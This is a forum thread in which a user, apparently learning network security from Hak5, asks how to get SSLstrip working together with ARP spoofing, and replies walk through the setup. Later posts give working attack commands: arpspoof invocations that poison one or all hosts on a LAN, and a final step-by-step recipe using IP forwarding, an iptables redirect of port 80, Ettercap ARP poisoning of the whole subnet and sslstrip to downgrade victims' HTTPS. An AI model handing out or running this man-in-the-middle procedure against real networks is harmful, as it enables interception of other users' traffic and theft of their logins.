Jump to content

SSLstrip with ARP Poisoning


uberleethax0r
 Share

Recommended Posts

Howdy all! I recently started watching Hak5, and have started to be a little more paranoid about my own online security. I want to try out some of the projects for myself, just to get a sense of network security. I have been working on getting SSLstrip to work on my own Windows computers, but I'm having a little trouble.

So, I can get SSL strip to work properly if I set the target machine's Firefox settings to listen to the hacker machine's port that I forwarded, as an HTTP proxy. Obviously, no man in the middle attack victims will have their proxy set that way, so I want to try ARP spoofing.

I can get Arp spoofing to properly send traffic from the target computer through mine, using Ettercap or Arpspoof, but for some reason, SSLstrip doesn't work using it.

Anyone know how to fix that?

Link to comment
Share on other sites

i was thinking the same thing... using an ssl strip on just 1 person is pointless. ssl stripping on a highly active line is more realistic

Er, yeah. I kinda think you missed the point. What I'm saying is how do you get sslstrip to work with arp poisoning? Like, instead of setting the victim's firefox http proxy to 192.168.1.2:80 ,etc.

Link to comment
Share on other sites

you should be able to give arpspoof a wild card operator. arpspoof -t thegateway *

As in, arpspoof everyone in the subnet? Does that work?

Anyway, what does that do for me? Like arpspoof -t 192.168.1.* 192.168.1.1 or variant? In every variant of that, it just gives back an error and doesn't do anything.

Link to comment
Share on other sites

$ man arpspoof

SYNOPSIS

arpspoof [-i interface] [-t target] host

<SNIP>

OPTIONS

-i interface

Specify the interface to use.

-t target

Specify a particular host to ARP poison (if not specified, all

hosts on the LAN).

host Specify the host you wish to intercept packets for (usually the

local gateway).

Link to comment
Share on other sites

Dang, that's scary that that works... Someone can actually make everybody on the LAN think their computer is a gateway..

As far as I can tell, that arpspoofing seems to work flawlessly. HOWEVER: I DON'T CARE ABOUT ARSPOOFING EVERYONE ON A LAN!

Why does SSLstrip not work when arpspoof-ified? Arpspoofing and SSLstrip each work on their own, but not together. Also, how do I get that to work?

I guess I didn't explain my question very well, but anyone get it now? Has anyone had this trouble? I followed the instructions exactly from Hak5, but the sslstrip-age doesn't work without specifically declaring the target computer to follow the port sslstrip listens on.

Link to comment
Share on other sites

K, so, I tried it in three operating systems: Windows, Backtrack (Which is a butt- it took me hours to get my wireless card working with ndiswrapper, but, that's another story.) and Ubuntu although I don't see why it would matter. I also tested it on three different LANs just to make sure it wasn't my gateway noticing it somehow.

So, first enable ip forwarding in the sysctrl configuration, and then sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 and then sudo python sslstrip.py -l 8080 Arpspoofing: sudo arpspoof -i eth1 -t 192.168.0.5 192.168.0.1

/me doesn't get why it doesn't work. It works perfectly when I set an http proxy to the hax0r computer on port 8080, but arpspoofing doesn't work.

We haven't made any progress on this forum thread. (No offense to you that answered - thank you.) Anyone got ideas?

Link to comment
Share on other sites

i don't understand what you mean when you say 'it doesn't work'. what doesn't work? sslstrip or arpspoof?

192.168.0.5 is the computer you want to trick

192.168.0.1 is the gateway you want to impersonate

what is the MAC address of the gateway and of the computer you're running arpspoof on?

Now check the target computer. What does it THINK the MAC address of the gateway is?

arp -a

Link to comment
Share on other sites

i don't understand what you mean when you say 'it doesn't work'. what doesn't work? sslstrip or arpspoof?

192.168.0.5 is the computer you want to trick

192.168.0.1 is the gateway you want to impersonate

what is the MAC address of the gateway and of the computer you're running arpspoof on?

Now check the target computer. What does it THINK the MAC address of the gateway is?

arp -a

They both work on their own. Arpspoofing properly makes the target think that the gateway is the mac address of the hax0r computer, but it doesn't strip ssl.

Link to comment
Share on other sites

  • 2 weeks later...
  • 2 weeks later...
  • 1 year later...

Flip your box into forwarding mode:

echo "1" > /proc/sys/net/ipv4/ip_forward

Setup iptables to redirect HTTP traffic to sslstrip:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Launch Ettercap:

ettercap -i <interface> -TqM ARP:REMOTE // //

Run sslstrip:

sslstrip -a -l <listenPort>

Sorted.

Edited by nykon
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...